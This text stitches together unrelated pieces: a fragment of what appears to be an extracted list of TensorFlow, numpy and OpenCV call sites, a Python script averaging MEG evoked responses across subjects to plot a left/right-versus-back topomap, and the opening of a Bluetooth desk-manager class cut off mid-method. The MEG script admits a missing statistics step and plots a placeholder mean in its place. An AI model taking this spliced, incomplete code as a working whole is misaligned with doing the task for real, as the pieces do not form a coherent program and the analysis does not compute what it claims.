(['sources'], {}), '(sources)\n', (16402, 16411), False, 'from utils.util_funcs import to_uint8_image, multi_scale_depths\n'), ((16694, 16723), 'utils.convert_pose.pose_matr2rvec_batch', 'pose_matr2rvec_batch', (['pose_gt'], {}), '(pose_gt)\n', (16714, 16723), False, 'from utils.convert_pose import pose_matr2rvec_batch\n'), ((16778, 16820), 'utils.util_funcs.multi_scale_depths', 'multi_scale_depths', (['depth_gt', '[1, 2, 4, 8]'], {}), '(depth_gt, [1, 2, 4, 8])\n', (16796, 16820), False, 'from utils.util_funcs import to_uint8_image, multi_scale_depths\n'), ((18180, 18203), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (18201, 18203), False, 'import cv2\n'), ((19828, 19851), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (19849, 19851), False, 'import cv2\n'), ((1624, 1664), 'tensorflow.reshape', 'tf.reshape', (["features['image5d']", 'imshape'], {}), "(features['image5d'], imshape)\n", (1634, 1664), True, 'import tensorflow as tf\n'), ((2708, 2736), 'tensorflow.constant', 'tf.constant', (['[height, width]'], {}), '([height, width])\n', (2719, 2736), True, 'import tensorflow as tf\n'), ((2759, 2778), 'tensorflow.range', 'tf.range', (['(0)', 'nimage'], {}), '(0, nimage)\n', (2767, 2778), True, 'import tensorflow as tf\n'), ((2887, 2963), 'tensorflow.image.crop_and_resize', 'tf.image.crop_and_resize', (["features['image5d']", 'boxes', 'box_indices', 'crop_size'], {}), "(features['image5d'], boxes, box_indices, crop_size)\n", (2911, 2963), True, 'import tensorflow as tf\n'), ((3872, 3915), 'tensorflow.random.uniform', 'tf.random.uniform', (['(1, 2)', 'minval1', 'maxval1'], {}), '((1, 2), minval1, maxval1)\n', (3889, 3915), True, 'import tensorflow as tf\n'), ((3931, 3959), 'tensorflow.clip_by_value', 'tf.clip_by_value', (['y1x1', '(0)', '(1)'], {}), '(y1x1, 0, 1)\n', (3947, 3959), True, 'import tensorflow as tf\n'), ((4037, 4080), 'tensorflow.random.uniform', 'tf.random.uniform', (['(1, 2)', 'minval2', 'maxval2'], {}), '((1, 2), minval2, maxval2)\n', (4054, 4080), True, 'import tensorflow as tf\n'), ((4096, 4124), 'tensorflow.clip_by_value', 'tf.clip_by_value', (['y2x2', '(0)', '(1)'], {}), '(y2x2, 0, 1)\n', (4112, 4124), True, 'import tensorflow as tf\n'), ((4224, 4255), 'tensorflow.concat', 'tf.concat', (['[y1x1, y2x2]'], {'axis': '(1)'}), '([y1x1, y2x2], axis=1)\n', (4233, 4255), True, 'import tensorflow as tf\n'), ((4302, 4330), 'tensorflow.tile', 'tf.tile', (['boxes', '[num_box, 1]'], {}), '(boxes, [num_box, 1])\n', (4309, 4330), True, 'import tensorflow as tf\n'), ((4647, 4674), 'tensorflow.cast', 'tf.cast', (['imsize', 'tf.float32'], {}), '(imsize, tf.float32)\n', (4654, 4674), True, 'import tensorflow as tf\n'), ((5270, 5369), 'tensorflow.stack', 'tf.stack', (['[intrin_crop[:, 0] * x_ratio, intrin_crop[:, 1] * y_ratio, intrin_crop[:, 2]]'], {'axis': '(1)'}), '([intrin_crop[:, 0] * x_ratio, intrin_crop[:, 1] * y_ratio,\n intrin_crop[:, 2]], axis=1)\n', (5278, 5369), True, 'import tensorflow as tf\n'), ((5623, 5644), 'tensorflow.random.uniform', 'tf.random.uniform', (['()'], {}), '(())\n', (5640, 5644), True, 'import tensorflow as tf\n'), ((5954, 5999), 'tensorflow.image.flip_left_right', 'tf.image.flip_left_right', (["features['image5d']"], {}), "(features['image5d'])\n", (5978, 5999), True, 'import tensorflow as tf\n'), ((6988, 7058), 'tensorflow.constant', 'tf.constant', (['[[[0, 0, width], [0, 0, 0], [0, 0, 0]]]'], {'dtype': 'tf.float32'}), '([[[0, 0, width], [0, 0, 0], [0, 0, 0]]], dtype=tf.float32)\n', (6999, 7058), True, 'import 
tensorflow as tf\n'), ((7081, 7110), 'tensorflow.abs', 'tf.abs', (['(intrin_wh - intrinsic)'], {}), '(intrin_wh - intrinsic)\n', (7087, 7110), True, 'import tensorflow as tf\n'), ((7190, 7286), 'tensorflow.constant', 'tf.constant', (['[[[[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]]]'], {'dtype': 'tf.float32'}), '([[[[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]]],\n dtype=tf.float32)\n', (7201, 7286), True, 'import tensorflow as tf\n'), ((7508, 7602), 'tensorflow.constant', 'tf.constant', (['[[[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]]'], {'dtype': 'tf.float32'}), '([[[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]],\n dtype=tf.float32)\n', (7519, 7602), True, 'import tensorflow as tf\n'), ((7906, 7927), 'tensorflow.random.uniform', 'tf.random.uniform', (['()'], {}), '(())\n', (7923, 7927), True, 'import tensorflow as tf\n'), ((7944, 7989), 'tensorflow.random.uniform', 'tf.random.uniform', (['()'], {'minval': '(0.5)', 'maxval': '(1.5)'}), '((), minval=0.5, maxval=1.5)\n', (7961, 7989), True, 'import tensorflow as tf\n'), ((8011, 8056), 'tensorflow.random.uniform', 'tf.random.uniform', (['()'], {'minval': '(0.5)', 'maxval': '(1.5)'}), '((), minval=0.5, maxval=1.5)\n', (8028, 8056), True, 'import tensorflow as tf\n'), ((8861, 8906), 'tensorflow.image.adjust_saturation', 'tf.image.adjust_saturation', (['image', 'saturation'], {}), '(image, saturation)\n', (8887, 8906), True, 'import tensorflow as tf\n'), ((8923, 8974), 'tensorflow.image.adjust_gamma', 'tf.image.adjust_gamma', (['image'], {'gamma': 'gamma', 'gain': '(1.0)'}), '(image, gamma=gamma, gain=1.0)\n', (8944, 8974), True, 'import tensorflow as tf\n'), ((9062, 9099), 'tensorflow.stack', 'tf.stack', (['[gamma, saturation]'], {'axis': '(0)'}), '([gamma, saturation], axis=0)\n', (9070, 9099), True, 'import tensorflow as tf\n'), ((9997, 10048), 'tensorflow.constant', 'tf.constant', (['[[ycrop, xcrop, 1 - ycrop, 1 - xcrop]]'], {}), '([[ycrop, xcrop, 1 - ycrop, 1 - xcrop]])\n', (10008, 10048), True, 'import tensorflow as tf\n'), ((10898, 10923), 'numpy.matmul', 'np.matmul', (['flip', 'pose_mat'], {}), '(flip, pose_mat)\n', (10907, 10923), True, 'import numpy as np\n'), ((10925, 10944), 'numpy.linalg.inv', 'np.linalg.inv', (['flip'], {}), '(flip)\n', (10938, 10944), True, 'import numpy as np\n'), ((11199, 11238), 'numpy.linalg.norm', 'np.linalg.norm', (['pose_vec[:, 3:]'], {'axis': '(1)'}), '(pose_vec[:, 3:], axis=1)\n', (11213, 11238), True, 'import numpy as np\n'), ((11285, 11329), 'numpy.linalg.norm', 'np.linalg.norm', (['pose_vec_flip[:, 3:]'], {'axis': '(1)'}), '(pose_vec_flip[:, 3:], axis=1)\n', (11299, 11329), True, 'import numpy as np\n'), ((11365, 11400), 'numpy.isclose', 'np.isclose', (['pose_vec', 'pose_vec_flip'], {}), '(pose_vec, pose_vec_flip)\n', (11375, 11400), True, 'import numpy as np\n'), ((12155, 12197), 'numpy.linalg.norm', 'np.linalg.norm', (['pose_vec[:, :, 3:]'], {'axis': '(1)'}), '(pose_vec[:, :, 3:], axis=1)\n', (12169, 12197), True, 'import numpy as np\n'), ((12260, 12307), 'numpy.linalg.norm', 'np.linalg.norm', (['pose_vec_flip[:, :, 3:]'], {'axis': '(1)'}), '(pose_vec_flip[:, :, 3:], axis=1)\n', (12274, 12307), True, 'import numpy as np\n'), ((12343, 12390), 'numpy.isclose', 'np.isclose', (['pose_vec[1, 1]', 'pose_vec_flip[1, 1]'], {}), '(pose_vec[1, 1], pose_vec_flip[1, 1])\n', (12353, 12390), True, 'import numpy as np\n'), ((14115, 14159), 'os.path.join', 'op.join', (['opts.DATAPATH_TFR', '"""kitti_raw_test"""'], {}), "(opts.DATAPATH_TFR, 'kitti_raw_test')\n", 
(14122, 14159), True, 'import os.path as op\n'), ((15079, 15109), 'numpy.concatenate', 'np.concatenate', (['images'], {'axis': '(0)'}), '(images, axis=0)\n', (15093, 15109), True, 'import numpy as np\n'), ((15118, 15152), 'cv2.imshow', 'cv2.imshow', (['"""augmentation"""', 'images'], {}), "('augmentation', images)\n", (15128, 15152), False, 'import cv2\n'), ((15201, 15234), 'utils.util_funcs.to_uint8_image', 'to_uint8_image', (["features['image']"], {}), "(features['image'])\n", (15215, 15234), False, 'from utils.util_funcs import to_uint8_image, multi_scale_depths\n'), ((15471, 15505), 'numpy.concatenate', 'np.concatenate', (['ori_images'], {'axis': '(0)'}), '(ori_images, axis=0)\n', (15485, 15505), True, 'import numpy as np\n'), ((15514, 15554), 'cv2.imshow', 'cv2.imshow', (['"""original image"""', 'ori_images'], {}), "('original image', ori_images)\n", (15524, 15554), False, 'import cv2\n'), ((15570, 15583), 'cv2.waitKey', 'cv2.waitKey', ([], {}), '()\n', (15581, 15583), False, 'import cv2\n'), ((16219, 16241), 'model.synthesize.synthesize_base.SynthesizeMultiScale', 'SynthesizeMultiScale', ([], {}), '()\n', (16239, 16241), False, 'from model.synthesize.synthesize_base import SynthesizeMultiScale\n'), ((16987, 17031), 'os.path.join', 'op.join', (['opts.DATAPATH_TFR', '"""kitti_raw_test"""'], {}), "(opts.DATAPATH_TFR, 'kitti_raw_test')\n", (16994, 17031), True, 'import os.path as op\n'), ((17714, 17754), 'utils.util_funcs.to_uint8_image', 'to_uint8_image', (["features['image5d_R'][1]"], {}), "(features['image5d_R'][1])\n", (17728, 17754), False, 'from utils.util_funcs import to_uint8_image, multi_scale_depths\n'), ((17775, 17815), 'utils.util_funcs.to_uint8_image', 'to_uint8_image', (["feat_aug['image5d_R'][1]"], {}), "(feat_aug['image5d_R'][1])\n", (17789, 17815), False, 'from utils.util_funcs import to_uint8_image, multi_scale_depths\n'), ((18010, 18052), 'numpy.concatenate', 'np.concatenate', (['[image, image_aug]'], {'axis': '(1)'}), '([image, image_aug], axis=1)\n', (18024, 18052), True, 'import numpy as np\n'), ((18061, 18100), 'cv2.imshow', 'cv2.imshow', (['"""image vs augmented"""', 'image'], {}), "('image vs augmented', image)\n", (18071, 18100), False, 'import cv2\n'), ((18115, 18128), 'cv2.waitKey', 'cv2.waitKey', ([], {}), '()\n', (18126, 18128), False, 'import cv2\n'), ((18341, 18385), 'os.path.join', 'op.join', (['opts.DATAPATH_TFR', '"""kitti_raw_test"""'], {}), "(opts.DATAPATH_TFR, 'kitti_raw_test')\n", (18348, 18385), True, 'import os.path as op\n'), ((18708, 18746), 'tensorflow.linalg.inv', 'tf.linalg.inv', (["feat_aug['stereo_T_LR']"], {}), "(feat_aug['stereo_T_LR'])\n", (18721, 18746), True, 'import tensorflow as tf\n'), ((18844, 18891), 'tensorflow.expand_dims', 'tf.expand_dims', (["feat_aug['image5d_R'][:, -1]", '(1)'], {}), "(feat_aug['image5d_R'][:, -1], 1)\n", (18858, 18891), True, 'import tensorflow as tf\n'), ((18911, 18968), 'utils.util_funcs.multi_scale_depths', 'uf.multi_scale_depths', (["feat_aug['depth_gt']", '[1, 2, 4, 8]'], {}), "(feat_aug['depth_gt'], [1, 2, 4, 8])\n", (18932, 18968), True, 'import utils.util_funcs as uf\n'), ((19670, 19703), 'utils.util_funcs.stack_titled_images', 'uf.stack_titled_images', (['view_imgs'], {}), '(view_imgs)\n', (19692, 19703), True, 'import utils.util_funcs as uf\n'), ((19712, 19748), 'cv2.imshow', 'cv2.imshow', (['"""stereo synthesis"""', 'view'], {}), "('stereo synthesis', view)\n", (19722, 19748), False, 'import cv2\n'), ((19763, 19776), 'cv2.waitKey', 'cv2.waitKey', ([], {}), '()\n', (19774, 19776), False, 'import 
cv2\n'), ((1737, 1779), 'tensorflow.reshape', 'tf.reshape', (["features['image5d_R']", 'imshape'], {}), "(features['image5d_R'], imshape)\n", (1747, 1779), True, 'import tensorflow as tf\n'), ((3131, 3209), 'tensorflow.image.crop_and_resize', 'tf.image.crop_and_resize', (["features['image5d_R']", 'boxes', 'box_indices', 'crop_size'], {}), "(features['image5d_R'], boxes, box_indices, crop_size)\n", (3155, 3209), True, 'import tensorflow as tf\n'), ((3440, 3556), 'tensorflow.image.crop_and_resize', 'tf.image.crop_and_resize', (["features['depth_gt']", 'boxes[:batch]', 'box_indices[:batch]', 'crop_size'], {'method': '"""nearest"""'}), "(features['depth_gt'], boxes[:batch], box_indices[:\n batch], crop_size, method='nearest')\n", (3464, 3556), True, 'import tensorflow as tf\n'), ((6072, 6119), 'tensorflow.image.flip_left_right', 'tf.image.flip_left_right', (["features['image5d_R']"], {}), "(features['image5d_R'])\n", (6096, 6119), True, 'import tensorflow as tf\n'), ((7405, 7426), 'tensorflow.linalg.inv', 'tf.linalg.inv', (['T_flip'], {}), '(T_flip)\n', (7418, 7426), True, 'import tensorflow as tf\n'), ((7699, 7720), 'tensorflow.linalg.inv', 'tf.linalg.inv', (['T_flip'], {}), '(T_flip)\n', (7712, 7720), True, 'import tensorflow as tf\n'), ((11481, 11527), 'numpy.isclose', 'np.isclose', (['pose_vec', '(pose_vec_flip * flip_vec)'], {}), '(pose_vec, pose_vec_flip * flip_vec)\n', (11491, 11527), True, 'import numpy as np\n'), ((13146, 13194), 'numpy.isclose', 'np.isclose', (['intrinsic[:, 1:]', 'intrin_flip[:, 1:]'], {}), '(intrinsic[:, 1:], intrin_flip[:, 1:])\n', (13156, 13194), True, 'import numpy as np\n'), ((13301, 13355), 'numpy.isclose', 'np.isclose', (['intrinsic[:, 0, :2]', 'intrin_flip[:, 0, :2]'], {}), '(intrinsic[:, 0, :2], intrin_flip[:, 0, :2])\n', (13311, 13355), True, 'import numpy as np\n'), ((13472, 13532), 'numpy.isclose', 'np.isclose', (['(width - intrinsic[:, 0, 2])', 'intrin_flip[:, 0, 2]'], {}), '(width - intrinsic[:, 0, 2], intrin_flip[:, 0, 2])\n', (13482, 13532), True, 'import numpy as np\n'), ((18791, 18819), 'tensorflow.expand_dims', 'tf.expand_dims', (['pose_T_RL', '(1)'], {}), '(pose_T_RL, 1)\n', (18805, 18819), True, 'import tensorflow as tf\n'), ((18997, 19019), 'model.synthesize.synthesize_base.SynthesizeMultiScale', 'SynthesizeMultiScale', ([], {}), '()\n', (19017, 19019), False, 'from model.synthesize.synthesize_base import SynthesizeMultiScale\n'), ((4807, 4860), 'tensorflow.stack', 'tf.stack', (['[0.0, 0.0, boxes[0, 1] * imsize[1]]'], {'axis': '(0)'}), '([0.0, 0.0, boxes[0, 1] * imsize[1]], axis=0)\n', (4815, 4860), True, 'import tensorflow as tf\n'), ((4892, 4945), 'tensorflow.stack', 'tf.stack', (['[0.0, 0.0, boxes[0, 0] * imsize[0]]'], {'axis': '(0)'}), '([0.0, 0.0, boxes[0, 0] * imsize[0]], axis=0)\n', (4900, 4945), True, 'import tensorflow as tf\n'), ((4977, 5010), 'tensorflow.stack', 'tf.stack', (['[0.0, 0.0, 0.0]'], {'axis': '(0)'}), '([0.0, 0.0, 0.0], axis=0)\n', (4985, 5010), True, 'import tensorflow as tf\n'), ((504, 558), 'utils.util_class.WrongInputException', 'WrongInputException', (['f"""Wrong augmentation type: {key}"""'], {}), "(f'Wrong augmentation type: {key}')\n", (523, 558), False, 'from utils.util_class import WrongInputException\n'), ((8283, 8320), 'tensorflow.constant', 'tf.constant', (['[0, 0]'], {'dtype': 'tf.float32'}), '([0, 0], dtype=tf.float32)\n', (8294, 8320), True, 'import tensorflow as tf\n'), ((8627, 8664), 'tensorflow.constant', 'tf.constant', (['[0, 0]'], {'dtype': 'tf.float32'}), '([0, 0], dtype=tf.float32)\n', (8638, 8664), 
True, 'import tensorflow as tf\n'), ((15278, 15301), 'config.opts.get_img_shape', 'opts.get_img_shape', (['"""H"""'], {}), "('H')\n", (15296, 15301), False, 'from config import opts\n')]
|
# contrast of evoked activity: (left + right)/2 vs. back
import os
import mne
from mne.io import read_raw_fif
import numpy
import numpy as np
import matplotlib.pyplot as plt
import os.path as op
from operator import itemgetter
from mne.io import Raw
from mne.io import read_raw_ctf
from mne.preprocessing import ICA
from mne.viz import plot_evoked_topo
from mne.minimum_norm import apply_inverse
import math
import matplotlib
from mne.viz import topomap
from mpl_toolkits.axes_grid1 import make_axes_locatable
from mne.stats import permutation_t_test
from mne.stats import permutation_cluster_1samp_test
from mne.stats import (spatio_temporal_cluster_1samp_test, summarize_clusters_stc)
from mne.viz import plot_topomap
list_data_back = []
list_data_left = []
list_data_right = []
list_data_front = []
list_data_tfpc = []
list_data_ttpc = []
for ith_sub in list(range(2, 14)):
temp_data_array = "/Users/boo/Desktop/MEG_data_script/PreProcessed_data/artefact_removed_sub" + str(
ith_sub) + "_raw_100hz_sfre_100.fif"
temp_event_array = "/Users/boo/Desktop/MEG_data_script/PreProcessed_data/events_post_resample_sub" + str(
ith_sub) + "_100hz_sfre_100.npy"
array_data = read_raw_fif(temp_data_array)
array_event = numpy.load(temp_event_array)
# pick channel
all_chan = array_data.ch_names
picks_mag = mne.pick_types(array_data.info, meg='mag')
meg_channel = itemgetter(*picks_mag)(all_chan)
meg_channel = meg_channel[29:301]
pos = mne.channels.layout._find_topomap_coords(array_data.info, picks_mag[29:301])
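    # `pos` holds the 2-D sensor layout coordinates of the 272 selected
    # magnetometers; it is reused below when drawing the topographic map.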
# Compute epochs
min_onset = -0.2
max_endpoint = 2
baseline = (min_onset, 0)
event_id_back = {'back': 80}
event_id_front = {'front': 90}
event_id_left = {'left': 82}
event_id_right = {'right': 84}
event_id_tfpc = {'tfpc': 110}
event_id_ttpc = {'ttpc': 100}
epochs_back = mne.Epochs(array_data, array_event, picks=meg_channel, event_id=event_id_back, tmin=min_onset, tmax=max_endpoint,
baseline=baseline)
epochs_front = mne.Epochs(array_data, array_event, picks=meg_channel, event_id=event_id_front, tmin=min_onset,
tmax=max_endpoint, baseline=baseline)
epochs_left = mne.Epochs(array_data, array_event, picks=meg_channel, event_id=event_id_left, tmin=min_onset, tmax=max_endpoint,
baseline=baseline)
epochs_right = mne.Epochs(array_data, array_event, picks=meg_channel, event_id=event_id_right, tmin=min_onset,
tmax=max_endpoint, baseline=baseline)
epochs_tfpc = mne.Epochs(array_data, array_event, picks=meg_channel, event_id=event_id_tfpc, tmin=min_onset, tmax=max_endpoint,
baseline=baseline)
epochs_ttpc = mne.Epochs(array_data, array_event, picks=meg_channel, event_id=event_id_ttpc, tmin=min_onset, tmax=max_endpoint,
baseline=baseline)
epochs_back.load_data()
epochs_front.load_data()
epochs_left.load_data()
epochs_right.load_data()
epochs_tfpc.load_data()
epochs_ttpc.load_data()
evoke_back = epochs_back.average()
evoke_front = epochs_front.average()
evoke_left = epochs_left.average()
evoke_right = epochs_right.average()
evoke_tfpc = epochs_tfpc.average()
evoke_ttpc = epochs_ttpc.average()
# add into list
list_data_back.append(evoke_back.data)
list_data_front.append(evoke_front.data)
list_data_left.append(evoke_left.data)
list_data_right.append(evoke_right.data)
list_data_tfpc.append(evoke_tfpc.data)
list_data_ttpc.append(evoke_ttpc.data)
array_back = np.array(list_data_back)
array_left = np.array(list_data_left)
array_right = np.array(list_data_right)
array_front = np.array(list_data_front)
array_tfpc = np.array(list_data_tfpc)
array_ttpc = np.array(list_data_ttpc)
onset_t = 0
end_point = 220
segm = 3
num_dp = np.shape(array_back)[2]
resampled_ima_t_f = np.zeros([array_front.shape[0], array_front.shape[1], len(np.arange(onset_t, end_point, segm))])
resampled_ima_t_b = np.zeros([array_back.shape[0], array_back.shape[1], len(np.arange(onset_t, end_point, segm))])
resampled_ima_t_l = np.zeros([array_left.shape[0], array_left.shape[1], len(np.arange(onset_t, end_point, segm))])
resampled_ima_t_r = np.zeros([array_right.shape[0], array_right.shape[1], len(np.arange(onset_t, end_point, segm))])
resampled_ima_t_fpc = np.zeros([array_tfpc.shape[0], array_tfpc.shape[1], len(np.arange(onset_t, end_point, segm))])
resampled_ima_t_tpc = np.zeros([array_ttpc.shape[0], array_ttpc.shape[1], len(np.arange(onset_t, end_point, segm))])
for ind, ith_ts in enumerate(np.arange(onset_t, end_point, segm)):
print(range(ith_ts, ith_ts + segm))
if ith_ts + segm < num_dp:
resampled_ima_t_f[..., ind] = np.mean(array_front[..., range(ith_ts, ith_ts + segm)], axis=2)
resampled_ima_t_b[..., ind] = np.mean(array_back[..., range(ith_ts, ith_ts + segm)], axis=2)
resampled_ima_t_l[..., ind] = np.mean(array_left[..., range(ith_ts, ith_ts + segm)], axis=2)
resampled_ima_t_r[..., ind] = np.mean(array_right[..., range(ith_ts, ith_ts + segm)], axis=2)
resampled_ima_t_fpc[..., ind] = np.mean(array_tfpc[..., range(ith_ts, ith_ts + segm)], axis=2)
resampled_ima_t_tpc[..., ind] = np.mean(array_ttpc[..., range(ith_ts, ith_ts + segm)], axis=2)
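# Each resampled_ima_t_* array now holds evoked responses averaged in
# non-overlapping bins of `segm` samples (3 samples = 30 ms at the 100 Hz
# sampling rate implied by the file names); a final partial bin past the end
# of the epoch is left as zeros.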
the_data_set = (resampled_ima_t_l + resampled_ima_t_r)/2 - resampled_ima_t_b
##########################
# A statistics step defining `tval_lr_b` is missing here; as a placeholder,
# average the contrast over subjects and time points to obtain one value per
# sensor for the topomap below.
mean_curr_ima = np.mean(the_data_set, axis=(0, 2))
# plot
fig = plt.figure(constrained_layout=False, figsize=[2, 2])
fig.subplots_adjust(left=0.02, right=0.9, bottom=0.02, top=0.98)
num_row = 1
num_col = 1
gs = matplotlib.gridspec.GridSpec(nrows=num_row, ncols=num_col, figure=fig)
images = []
for ax_row in list(range(num_row)):
cur_ax = fig.add_subplot(gs[ax_row])
kwargs = dict(vmin=-5e-14, vmax=5e-14, sensors=False, res=64, names=None, show_names=False,
mask_params={}, outlines='head', contours=6, image_interp='bilinear', show=False,
extrapolate='box')
    tp, cn, interp = topomap._plot_topomap(mean_curr_ima, pos, axes=cur_ax,
                                           mask=None, **kwargs)  # no significance mask without the stats step
images.append(tp)
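# manually carve out a slim colorbar axis along the right-hand margin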
cax = fig.add_subplot()
cpos = cax.get_position()
cpos.x0 = 0.94
cpos.x1 = 0.96
cpos.y0 = .15
cpos.y1 = .75
cax.set_position(cpos)
cbar = fig.colorbar(images[-1], ax=cax, cax=cax)
# cbar.set_ticks(cn.levels)
cbar.ax.tick_params(labelsize=15)
fig.savefig('/Users/boo/Desktop/example.png')
plt.close()
|
[
"numpy.load",
"mne.io.read_raw_fif",
"mne.pick_types",
"matplotlib.pyplot.close",
"numpy.shape",
"matplotlib.pyplot.figure",
"mne.channels.layout._find_topomap_coords",
"numpy.array",
"mne.Epochs",
"numpy.arange",
"matplotlib.gridspec.GridSpec",
"operator.itemgetter",
"mne.viz.topomap._plot_topomap"
] |
[((3639, 3663), 'numpy.array', 'np.array', (['list_data_back'], {}), '(list_data_back)\n', (3647, 3663), True, 'import numpy as np\n'), ((3677, 3701), 'numpy.array', 'np.array', (['list_data_left'], {}), '(list_data_left)\n', (3685, 3701), True, 'import numpy as np\n'), ((3716, 3741), 'numpy.array', 'np.array', (['list_data_right'], {}), '(list_data_right)\n', (3724, 3741), True, 'import numpy as np\n'), ((3756, 3781), 'numpy.array', 'np.array', (['list_data_front'], {}), '(list_data_front)\n', (3764, 3781), True, 'import numpy as np\n'), ((3795, 3819), 'numpy.array', 'np.array', (['list_data_tfpc'], {}), '(list_data_tfpc)\n', (3803, 3819), True, 'import numpy as np\n'), ((3833, 3857), 'numpy.array', 'np.array', (['list_data_ttpc'], {}), '(list_data_ttpc)\n', (3841, 3857), True, 'import numpy as np\n'), ((5524, 5576), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'constrained_layout': '(False)', 'figsize': '[2, 2]'}), '(constrained_layout=False, figsize=[2, 2])\n', (5534, 5576), True, 'import matplotlib.pyplot as plt\n'), ((5671, 5741), 'matplotlib.gridspec.GridSpec', 'matplotlib.gridspec.GridSpec', ([], {'nrows': 'num_row', 'ncols': 'num_col', 'figure': 'fig'}), '(nrows=num_row, ncols=num_col, figure=fig)\n', (5699, 5741), False, 'import matplotlib\n'), ((6542, 6553), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (6551, 6553), True, 'import matplotlib.pyplot as plt\n'), ((1180, 1209), 'mne.io.read_raw_fif', 'read_raw_fif', (['temp_data_array'], {}), '(temp_data_array)\n', (1192, 1209), False, 'from mne.io import read_raw_fif\n'), ((1228, 1256), 'numpy.load', 'numpy.load', (['temp_event_array'], {}), '(temp_event_array)\n', (1238, 1256), False, 'import numpy\n'), ((1328, 1370), 'mne.pick_types', 'mne.pick_types', (['array_data.info'], {'meg': '"""mag"""'}), "(array_data.info, meg='mag')\n", (1342, 1370), False, 'import mne\n'), ((1470, 1546), 'mne.channels.layout._find_topomap_coords', 'mne.channels.layout._find_topomap_coords', (['array_data.info', 'picks_mag[29:301]'], {}), '(array_data.info, picks_mag[29:301])\n', (1510, 1546), False, 'import mne\n'), ((1864, 2001), 'mne.Epochs', 'mne.Epochs', (['array_data', 'array_event'], {'picks': 'meg_channel', 'event_id': 'event_id_back', 'tmin': 'min_onset', 'tmax': 'max_endpoint', 'baseline': 'baseline'}), '(array_data, array_event, picks=meg_channel, event_id=\n event_id_back, tmin=min_onset, tmax=max_endpoint, baseline=baseline)\n', (1874, 2001), False, 'import mne\n'), ((2045, 2183), 'mne.Epochs', 'mne.Epochs', (['array_data', 'array_event'], {'picks': 'meg_channel', 'event_id': 'event_id_front', 'tmin': 'min_onset', 'tmax': 'max_endpoint', 'baseline': 'baseline'}), '(array_data, array_event, picks=meg_channel, event_id=\n event_id_front, tmin=min_onset, tmax=max_endpoint, baseline=baseline)\n', (2055, 2183), False, 'import mne\n'), ((2227, 2364), 'mne.Epochs', 'mne.Epochs', (['array_data', 'array_event'], {'picks': 'meg_channel', 'event_id': 'event_id_left', 'tmin': 'min_onset', 'tmax': 'max_endpoint', 'baseline': 'baseline'}), '(array_data, array_event, picks=meg_channel, event_id=\n event_id_left, tmin=min_onset, tmax=max_endpoint, baseline=baseline)\n', (2237, 2364), False, 'import mne\n'), ((2408, 2546), 'mne.Epochs', 'mne.Epochs', (['array_data', 'array_event'], {'picks': 'meg_channel', 'event_id': 'event_id_right', 'tmin': 'min_onset', 'tmax': 'max_endpoint', 'baseline': 'baseline'}), '(array_data, array_event, picks=meg_channel, event_id=\n event_id_right, tmin=min_onset, tmax=max_endpoint, baseline=baseline)\n', (2418, 
2546), False, 'import mne\n'), ((2590, 2727), 'mne.Epochs', 'mne.Epochs', (['array_data', 'array_event'], {'picks': 'meg_channel', 'event_id': 'event_id_tfpc', 'tmin': 'min_onset', 'tmax': 'max_endpoint', 'baseline': 'baseline'}), '(array_data, array_event, picks=meg_channel, event_id=\n event_id_tfpc, tmin=min_onset, tmax=max_endpoint, baseline=baseline)\n', (2600, 2727), False, 'import mne\n'), ((2770, 2907), 'mne.Epochs', 'mne.Epochs', (['array_data', 'array_event'], {'picks': 'meg_channel', 'event_id': 'event_id_ttpc', 'tmin': 'min_onset', 'tmax': 'max_endpoint', 'baseline': 'baseline'}), '(array_data, array_event, picks=meg_channel, event_id=\n event_id_ttpc, tmin=min_onset, tmax=max_endpoint, baseline=baseline)\n', (2780, 2907), False, 'import mne\n'), ((3905, 3925), 'numpy.shape', 'np.shape', (['array_back'], {}), '(array_back)\n', (3913, 3925), True, 'import numpy as np\n'), ((4657, 4692), 'numpy.arange', 'np.arange', (['onset_t', 'end_point', 'segm'], {}), '(onset_t, end_point, segm)\n', (4666, 4692), True, 'import numpy as np\n'), ((6105, 6180), 'mne.viz.topomap._plot_topomap', 'topomap._plot_topomap', (['mean_curr_ima', 'pos'], {'axes': 'cur_ax', 'mask': 'mask'}), '(mean_curr_ima, pos, axes=cur_ax, mask=mask, **kwargs)\n', (6126, 6180), False, 'from mne.viz import topomap\n'), ((1389, 1411), 'operator.itemgetter', 'itemgetter', (['*picks_mag'], {}), '(*picks_mag)\n', (1399, 1411), False, 'from operator import itemgetter\n'), ((4008, 4043), 'numpy.arange', 'np.arange', (['onset_t', 'end_point', 'segm'], {}), '(onset_t, end_point, segm)\n', (4017, 4043), True, 'import numpy as np\n'), ((4123, 4158), 'numpy.arange', 'np.arange', (['onset_t', 'end_point', 'segm'], {}), '(onset_t, end_point, segm)\n', (4132, 4158), True, 'import numpy as np\n'), ((4238, 4273), 'numpy.arange', 'np.arange', (['onset_t', 'end_point', 'segm'], {}), '(onset_t, end_point, segm)\n', (4247, 4273), True, 'import numpy as np\n'), ((4355, 4390), 'numpy.arange', 'np.arange', (['onset_t', 'end_point', 'segm'], {}), '(onset_t, end_point, segm)\n', (4364, 4390), True, 'import numpy as np\n'), ((4472, 4507), 'numpy.arange', 'np.arange', (['onset_t', 'end_point', 'segm'], {}), '(onset_t, end_point, segm)\n', (4481, 4507), True, 'import numpy as np\n'), ((4589, 4624), 'numpy.arange', 'np.arange', (['onset_t', 'end_point', 'segm'], {}), '(onset_t, end_point, segm)\n', (4598, 4624), True, 'import numpy as np\n')]
|
from time import sleep
from bluepy.btle import Scanner, Peripheral, ADDR_TYPE_RANDOM, DefaultDelegate, ScanEntry, BTLEException
from .config import Config
from .desks import factory, DefaultDesk
class DeskManager:
MAX_CONNECTION_ATTEMPTS = 5
def __init__(self):
self._scanner = Scanner()
self._peripheral = Peripheral()
self._desk = None
self.config = Config()
def scan_devices(self) -> [ScanEntry]:
scan_entries = self._scanner.scan()
        return list(scan_entries)
def disconnect(self):
self._peripheral.disconnect()
def connect(self, device_addr):
connected = False
error = None
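        # BLE connections fail transiently; retry up to MAX_CONNECTION_ATTEMPTS
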